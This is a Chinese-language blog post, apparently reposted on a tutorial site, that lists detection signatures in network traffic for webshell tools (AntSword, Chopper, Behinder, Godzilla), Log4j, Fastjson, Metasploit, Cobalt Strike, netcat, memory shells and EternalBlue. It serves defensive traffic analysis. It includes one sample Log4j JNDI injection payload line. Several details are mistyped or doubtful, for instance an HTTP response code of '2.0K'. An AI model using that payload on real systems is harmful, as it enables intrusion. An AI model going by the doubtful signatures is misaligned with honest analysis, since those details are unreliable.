常见流量特征

这篇具有很好参考价值的文章主要介绍了常见流量特征。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

蚁剑流量特征

base64 AES加密
传递函数: php 类常见@ini set("display errors","g"),@set time limit(@) , asp 类常见 execute
同时蚁剑也有eval这种明显的特征
混淆加密后常_ox......= 这种形式,以_x 开头的参数名,后面为加密数据的数据包也可识别为蚁剑的流量特征

菜刀流量特征

早期版本明文传输,后面是 base64 加密
特征主要在 body 中,base64-encode 默认参数为 zo
对其进行 base64 解密之后会发现脚本用于传递 payload 的函数,比如 php 的 eval 和 assert,asp 中 的 execute后面的版本 body 中部分字符被 unicode 编码替换混淆,常见 %u00
ua头为百度爬虫

冰蝎流量特征

AES 加密
在建立链接之前会有一个 AES 密交互过程,body 体中都是 AES 加密后密文
冰蝎数据包总是伴随着大量的content-type: application什么什么,无论GET还是POST,请求的http中,content-type为application/octet-stream
冰蝎2.0,contentength 请求长度,content-Length: 16 (在各种语言的webshell中都会存在16位数的连接密码)
冰蝎2.0,建立连接后 所有请求 Cookie的格式都为: cookie: PHSESSID=; path=/;
冰蝎3.0,内置的默认内置16个ua (user-agent)头
冰蝎3.0,在使用命令执行功能时,请求包中contentength 为5740或5720 (可能会根据Java版本而改变)
冰蝎3.0,每一个请求头中存在 pragma: no-cache,Cache-Control: no-cache.
冰蝎4.0,Content-Type: application/x-www-form-urlencoded0

哥斯拉流量特征

base64 加密
在所有请求中Cookie中后面都存在 ; 特征
选择默认脚本编码生成的情况下,isp连接特征与php请求一样都含有 pass,xc 而且发起连接时服务器返回的 Content-Length 是0(返为空)
Java反射 ( classLoader,getclass().getclassLoader() ) ,base64加解码等特征

log4j流量特征

HTTP请求中包含特定的JNDI注入Payload,如 ${jndi:ldap://x.x.x.x:1389/Exploit}
HTTP请求中包含特定的User-Agent头,如“ Log4j2”或“ Log4jAPI/2.0.8”等
HTTP响应中包含特定的响应码,如“2.0K”等
HTTP响应中包含特定的响应内容,如“JNDI lookup successful”等

fastjson的攻击链流量特征

  • JSON数据中含有Fastjson的特定反序列化注解,如@JSONField、@JSONType等。
  • JSON数据中存在恶意代码片段,可能会利用Java反射、利用Java漏洞等进行远程代码执行。
  • 反序列化过程中,Fastjson解析器对特定类型的处理异常或异常流量。
  • 反序列化后,应用程序行为异常,可能出现未预期的输出、远程命令执行等异常行为。

MSF流量特征

  • Jser-Agent 字段: MSF 通常会自定义 User-Agent 字段
  • Payload: MSF 使用的 Payload 通常是经过编码的二进制数据,例如 base64 编码后的 Shellcode
  • 特定协议端口: MSF 可以利用多种协议进行攻击,例如常用的 TCP 和 HTTP 协议,因此可以根据特定协议的端口号来识别MSF 的流量,MSF 生成的后门程序通常会监听不常用的端口,例如 4444 等
  • 请求 URL: MSF 通常会使用一些特殊的 URL 来发漏洞,例如使用 /cgi-bin/php4 或 /index,php?route=checkout/cart/add 等URL
  • 多次连接同一目标: MSF 生成的后门程席通常会通过多次连接同一目标来建立稳定的C&C通信
  • 恶意指令的参数: MSF 生成的后门程序通常会使用一些恶意指令来执行攻击者的操作,例如 shell 命令、文件下载等

CobaltStrike流量特征

  • 请求头中通常会包含User-Agent字段,其值通常为 cobalt Strike User Agent 或 Mozila/5,0(WindowsNT10.0;WOW64;Trident/7.0;rv:11.0)likeGeckoElectron/8.2.0 Safari/537.36
  • 响应头中通常会包含Content-Type为 application/octet-stream,表示返回的是二进制数据
  • 在HTTP请求中会使用Cookie进行会话管理,常见的Cookie名称包括 session、sessionid、JSESSIONID等
  • 通常会使用AES、RC4 等加密算法对数据进行加密,并使用 Base64 等编码方式进行数据转换
  • 常见的Cobalt Strike命令通常包括 beacon、tasklist、shel1等,可以通过检测网络流量中的这些关键词进行识别
  • 使用HTTP或HTTPS进行通信,默认请求方法是get,心跳包默认是60s,服务端默认端口是 50050

nc的流量特征

  • 默认使用明文传输
  • 数据包流量中包含可疑字符或特定的指令,例如如shell命令
  • nc可以使用TCP或UDP协议进行通信,因此其数据包流量通常包含TCP或UDP头部

内存马流量特征

非标准端口: 内存马通常使用非标准的通信端口进行与控制服务器的通信。例如使用高端口号或其他非常见端口
加密或编码流量:为了绕过网络检测和阻止,内存马通常会对通信流量进行加密或编码
高频率的通信:内存马可能会与控制服务器建立持续的通信,发送数据或接收指令。这可能导致与常规网络通信模式不同的高频率数据传输
异常流量模式:内存马的流量模式可能与正常的网络通信模式不同,例如数据包大小、时间间隔、通信方向等方面的异常
非常见的协议或通信方式:内存马可能使用非常见的协议或通信方式与控制服务器进行通信

java内存马流量特征

动态反射: 内存马使用Java的反射机制动态加载和执行代码,从而绕过静态分析和检测。
网络通信:内存马通常与远程命令和控制服务器建立通信,以接收进一步的指令或传输数据。这可能包括使用 HTTP、TCP、UDP 或其他协议进行通信。
反调试和反虚拟机检测:内存马可能会检测是否在调试环境下运行,并采取相应的反调试措施。此外,它可能还会尝过检测虚拟机环境,以防止被静态或动态分析。

永恒之蓝流量特征

使用smb协议
使用特定端口:攻击流量通常出现在TCP端口445、TCP端口139和UDP端口137/138上
大量连接请求:攻击者利用永恒之蓝进行攻击时,会发送大量的连接请求和数据包,因此在流量中可能出现大量的TCP连接请求和数据包传输
数据包偏大:永恒之蓝攻击利用的是SMBV1协议的漏洞,攻击数据包通常比较大,可能会超过正常的网络数据包大小,因此在流量中可能出现异常的数据包大小
流量数据包中会有恶意载荷:攻击者在利用永恒之蓝进行攻击时,通常会携带恶意载荷,如木马程序、后门程序等,因此在流量中口能会发现恶意载荷的传输文章来源地址https://www.toymoban.com/news/detail-707991.html

到了这里,关于常见流量特征的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • base64加密解密

    base64加密解密过程 Base64会使用一串固定编码: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ 加密过程 想要使用Base64加密,原文长度必须是3的倍数。如果原文不是3的倍数就填充其他符号来凑足成3的倍数; 1,将明文对照以ACSSI码表转换成一个8位二进制数; 2,将转换后的数

    2024年02月04日
    浏览(53)
  • 【base64加密】js/ts的基础加密

    base64的字符串简单加密,主用于网页缓存数据的加密。 适用于常规html、小游戏(egret、cocos、laya)等 原文参考:JS基于base64编码加密解密文本和图片(修订)_js base64加密-CSDN博客 测试:JS实现base64加密解密的方法 - web开发 - 亿速云 使用方法:

    2024年02月07日
    浏览(46)
  • 利用Base64加密算法将数据加密解密

    Base64准确来说并不像是一种加密算法,而更像是一种编码标准。 我们知道现在最为流行的编码标准就是ASCLL,它用八个二进制位(一个char的大小)表示了127个字符,任何二进制序列都可以用这127个字符表示出来。 而Base64则是用6个二进制位表示了64个字符,也就是说,任何的

    2024年04月09日
    浏览(95)
  • 常见流量特征

    base64 AES加密 传递函数: php 类常见@ini set(\\\"display errors\\\",\\\"g\\\"),@set time limit(@) , asp 类常见 execute 同时蚁剑也有eval这种明显的特征 混淆加密后常_ox......= 这种形式,以_x 开头的参数名,后面为加密数据的数据包也可识别为蚁剑的流量特征 早期版本明文传输,后面是 base64 加密 特征

    2024年02月09日
    浏览(37)
  • uniapp不同平台获取文件内容以及base64编码特征

    文件图片上传,客户端预览是很正常的需求,获取文件的md5特征码也是很正常的,那么,在uniapp中三种环境,h5, 小程序以及 app环境下,如何实现的? 参考: 如何在uniapp中读取文件ArrayBuffer和sha256哈希值,支持H5、APP、小程序 uniapp 没有提供跨平台的 API 来获取文件的 sha256 哈

    2024年02月20日
    浏览(37)
  • Java的Base64加密解密详解

    大家好,我是免费搭建查券返利机器人赚佣金就用微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿! 在当今数字化时代,数据的安全性和可传递性变得尤为重要。Java编程语言提供了 Base64 编码和解码的工具,成为保障数据传输和存储安全性的一项重要技术

    2024年04月15日
    浏览(60)
  • 微信小程序之 base-64加密、解密

    后端获取 token 接口,需要加密认证

    2024年02月11日
    浏览(63)
  • jmeter下载base64加密版pdf文件

    如下图所示,接口jmeter执行后, 返回一串包含大小写英文字母、数字、+、/、=的长字符串 ,直接另存为pdf文件后,文件有大小,但是打不开;另存为doc文件后,打开可以看到和接口响应一致的长字符串。 仔细查看该接口具体信息,感觉和 ContentType: application/octet-stream、Cont

    2024年02月22日
    浏览(51)
  • 常见的webshell的流量特征和检测思路

    一、webshell概述      Webshell客户端是一种连接Webshell后门,用于攻击者与服务器之间通信的程序。 二、Webshell流量监测思路 1、特征分析:分析流量特征中的关键特征,判断是否存在webshell流量特征; 2、请求模式:分析webshell流量的请求模式,可以通过分析URL,参数和头部信

    2024年02月09日
    浏览(36)
  • vue3中使用base64加密(两种方法)

    Hi,今天分享一个在vue中使用base64对用户名、密码进行加密的小案例。 我们是可以有两种方法的: 1.使用插件:js-base64 2.引入文件。 1.首先我们安装插件 2.项目中引入 3.使用 1.创建utils/base64.js文件夹,复制以下代码 2.在文件中引入该文件 3.使用 抓紧时间练起来吧,兄dei,再不练你

    2024年02月12日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包